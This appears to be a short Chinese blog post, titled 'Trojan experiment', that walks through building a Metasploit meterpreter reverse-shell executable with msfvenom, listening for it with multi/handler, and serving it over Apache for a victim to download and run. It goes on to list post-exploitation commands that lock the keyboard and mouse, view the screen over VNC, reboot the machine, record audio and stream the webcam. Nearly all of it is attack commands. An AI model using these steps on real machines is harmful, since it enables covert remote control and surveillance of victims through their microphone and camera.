木马实验

第一步:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.17 lport=5555 -f exe >/root/Desktop/bingdu.exe
在这里插入图片描述

第二步:msfconsole
在这里插入图片描述

第三步:use exploit/multi/handler
在这里插入图片描述
第四步:set payload windows/meterpreter/reverse_tcp
在这里插入图片描述
第五步:show options
在这里插入图片描述
第六步:set LHOST 192.168.31.17
第七步:set LPORT 5555
在这里插入图片描述

第八步:show options
在这里插入图片描述
第九步:exploit
在这里插入图片描述
第十步:将病毒文件移动到/var/www/html文件夹下
在这里插入图片描述
第十一步:/etc/init.d/apache2 start
在这里插入图片描述
第十二步:下载病毒文件
在这里插入图片描述
第十三步:双击病毒文件
在这里插入图片描述
第十四步:ps | grep explorer
在这里插入图片描述
第十五步:键盘鼠标锁定:uictl disable keyboard
uictl enable keyboard(mouse/all)
在这里插入图片描述

第十六步:远程桌面查看:run vnc
在这里插入图片描述
在这里插入图片描述
第十七步:reboot
在这里插入图片描述
录音:record -d 10 (10是十秒的意思,生成的音频是wav格式的,找一个播放器就可以播放)

打开机器的网络摄像头:webcam_stream

发布了10 篇原创文章 · 获赞 0 · 访问量 2368

猜你喜欢

转载自blog.csdn.net/qq_42250189/article/details/104488861